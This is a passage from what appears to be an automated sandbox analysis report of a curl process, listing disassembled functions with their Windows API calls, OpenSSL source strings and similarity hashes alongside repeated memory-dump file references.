                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                                                                    • API String ID: 3489934621-2819208100
                                                                                                                                                                    • Opcode ID: 558fdbb3652e3baa4aafbb6a698aae301f3ac210eb787f29a83baf3e755edf75
                                                                                                                                                                    • Instruction ID: 655ac908f6af7e2fccbd8c2865e763013dcf9fff41b55f4ffac48161ba45aea5
                                                                                                                                                                    • Opcode Fuzzy Hash: 558fdbb3652e3baa4aafbb6a698aae301f3ac210eb787f29a83baf3e755edf75
                                                                                                                                                                    • Instruction Fuzzy Hash: A5E046F09A9B00EBEB218F28FC4CB00BB68B74071AF50DA5AF005D11A0CBB08819CF64
                                                                                                                                                                    Function 001DEFB0 Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 002085F0: getaddrinfo.WS2_32(?,?,?,?), ref: 0020860B
                                                                                                                                                                      • Part of subcall function 002085F0: freeaddrinfo.WS2_32(?,?,?,?,?,?,?,?,00000000), ref: 00208710
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 001DF004
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 001DF00A
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 001DF021
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 001DF02F
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000000), ref: 001DF03C
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 001DF087
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$ErrorLastLeave$DeleteEnterfreeaddrinfogetaddrinfo
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2133702940-0
                                                                                                                                                                    • Opcode ID: dc6e68940d829040d8730ef45d58e90742851c7168de3c747e567185e6bb38ef
                                                                                                                                                                    • Instruction ID: 7768405aa9cb9becabd5942d1c560fcb0c9b0443a07aacc16b74e8c71bffeede
                                                                                                                                                                    • Opcode Fuzzy Hash: dc6e68940d829040d8730ef45d58e90742851c7168de3c747e567185e6bb38ef
                                                                                                                                                                    • Instruction Fuzzy Hash: A8218C716017419BD720EF24DC49B57B7EAFF88304F01892EF59A83252DB71EA15CBA1
                                                                                                                                                                    Function 001DF270 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,?,?,001DD2A7), ref: 001DF288
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001DF296
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandleObjectSingleWait
                                                                                                                                                                    • String ID: Could not resolve %s: %s$host$proxy
                                                                                                                                                                    • API String ID: 528846559-2205167006
                                                                                                                                                                    • Opcode ID: be6f242b2a88d1a1056aba0ae155e9824faee46c987d0438d804a34a581c08e3
                                                                                                                                                                    • Instruction ID: 4d08de1e0627206b29866fa19f93a7b20b916fa6539d8416f97fb1501f70cbae
                                                                                                                                                                    • Opcode Fuzzy Hash: be6f242b2a88d1a1056aba0ae155e9824faee46c987d0438d804a34a581c08e3
                                                                                                                                                                    • Instruction Fuzzy Hash: 9E21D1B42052449FDB119F28C8847A97BE4FB48314F5841BEFD468F386D7719946CB68
                                                                                                                                                                    Function 002CD794 Relevance: 7.7, APIs: 5, Instructions: 215COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 03e8a90d79a51bbc415fac89c4d28e0f87b842b9088f2f1b737816c49d8b58c0
                                                                                                                                                                    • Instruction ID: 9668a85adcb710003ddee01ec43b0522308eab474ba750b3b603d18cb0a505e1
                                                                                                                                                                    • Opcode Fuzzy Hash: 03e8a90d79a51bbc415fac89c4d28e0f87b842b9088f2f1b737816c49d8b58c0
                                                                                                                                                                    • Instruction Fuzzy Hash: D271BF399202179BCF219F698884FBEBBB5EF91350F14473EE85567190D7709C22CB91
                                                                                                                                                                    Function 002C1A1E Relevance: 7.6, APIs: 5, Instructions: 144COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 17c7762cf400b01fd271147ca7c41044a851820099dc1abd0e86f0797cc3918d
                                                                                                                                                                    • Instruction ID: 7947e41ac130d09cf4b2f90d0455228f7d3b122fd00448e4e73a3ded827d12f0
                                                                                                                                                                    • Opcode Fuzzy Hash: 17c7762cf400b01fd271147ca7c41044a851820099dc1abd0e86f0797cc3918d
                                                                                                                                                                    • Instruction Fuzzy Hash: BA513E39D21209AACB01EFE4D845BEEB7B8FF09710F14421AE815E7251EB70DE61CB65
                                                                                                                                                                    Function 00284E70 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 131COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?), ref: 00284EB9
                                                                                                                                                                    Strings
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\evp\evp_lib.c, xrefs: 002851AB
                                                                                                                                                                    • mac_size <= MAX_MAC_SIZE, xrefs: 0028521E
                                                                                                                                                                    • ..\..\openssl\openssl\ssl\s2_pkt.c, xrefs: 00285228
                                                                                                                                                                    • ..\..\openssl\openssl\ssl\s2_pkt.c, xrefs: 002851C6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                    • String ID: ..\..\openssl\openssl\crypto\evp\evp_lib.c$..\..\openssl\openssl\ssl\s2_pkt.c$..\..\openssl\openssl\ssl\s2_pkt.c$mac_size <= MAX_MAC_SIZE
                                                                                                                                                                    • API String ID: 1452528299-292904039
                                                                                                                                                                    • Opcode ID: d6affa39516a76da51fc1bf95489a962c6621c5b0abbf1338e4f94042c7ab63f
                                                                                                                                                                    • Instruction ID: af2bba7682c0e79f0b103511cd9d966a21753b613d18fc86ba6e55f470edabb5
                                                                                                                                                                    • Opcode Fuzzy Hash: d6affa39516a76da51fc1bf95489a962c6621c5b0abbf1338e4f94042c7ab63f
                                                                                                                                                                    • Instruction Fuzzy Hash: 7441D234611B018FE320EF08C985B66B7E2FF84718F54452DE64A4BAD1D7B5EC65CB41
                                                                                                                                                                    Function 002C4046 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • AreFileApisANSI.KERNEL32(001C5539,00000109,00000000,?,002C38E3,?,00000000,00000000,?,002C387A,002C0DD6,001C5539,?,001C5539,?,00000040), ref: 002C4079
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,001C5539,00000109,00000000,?,002C38E3,?,00000000,00000000,?,002C387A), ref: 002C4093
                                                                                                                                                                    • GetLastError.KERNEL32(?,002C38E3,?,00000000,00000000,?,002C387A,002C0DD6,001C5539,?,001C5539,?,00000040,00000000,00307B60,00000014), ref: 002C40A0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ApisByteCharErrorFileLastMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1538486781-0
                                                                                                                                                                    • Opcode ID: 9c111bf50bde314ae9b621f150529ff32611babe1e4dc6b435812f4ff5191c8d
                                                                                                                                                                    • Instruction ID: a0ee1b9a626dfc17b85d6649c02009f4cdea643217152508824b881a28c75b1d
                                                                                                                                                                    • Opcode Fuzzy Hash: 9c111bf50bde314ae9b621f150529ff32611babe1e4dc6b435812f4ff5191c8d
                                                                                                                                                                    • Instruction Fuzzy Hash: 021181715A4616AFEB247FB09C49FBB779CEF14361B10462DFA41C5191EA71CC608B50
                                                                                                                                                                    Function 002D0314 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,002D02F1,?,00307FA8,0000000C,002D03D7,?,?,002C41C5,002CEE8B), ref: 002D0327
                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,002D02F1,?,00307FA8,0000000C,002D03D7,?,?,002C41C5,002CEE8B), ref: 002D0332
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,002D02F1,?,00307FA8,0000000C,002D03D7,?,?,002C41C5,002CEE8B), ref: 002D0399
                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,?,?,?,?,002D02F1,?,00307FA8,0000000C,002D03D7,?,?,002C41C5,002CEE8B), ref: 002D03A7
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,002D02F1,?,00307FA8,0000000C,002D03D7,?,?,002C41C5,002CEE8B), ref: 002D03B3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Pointer$Encode$Decode
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1898114064-0
                                                                                                                                                                    • Opcode ID: b4ba81ce0af73fdb3cbdbe69491a9e7b1eb81f19fe9231ab1fe2ac1d8aa14574
                                                                                                                                                                    • Instruction ID: 7a6f1f81edbe6a39456d87427836391c455c830d124054c406fcfb48c0171b3d
                                                                                                                                                                    • Opcode Fuzzy Hash: b4ba81ce0af73fdb3cbdbe69491a9e7b1eb81f19fe9231ab1fe2ac1d8aa14574
                                                                                                                                                                    • Instruction Fuzzy Hash: EF11DF32A25615AFDB459B34ECC8E6A77ADEB04391F10056BE805D3321EB70EC908BA4
                                                                                                                                                                    Function 002CEEAB Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 002CEEB0
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 002CEEE4
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 002CEF0A
                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002CEF1E
                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002CEF29
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
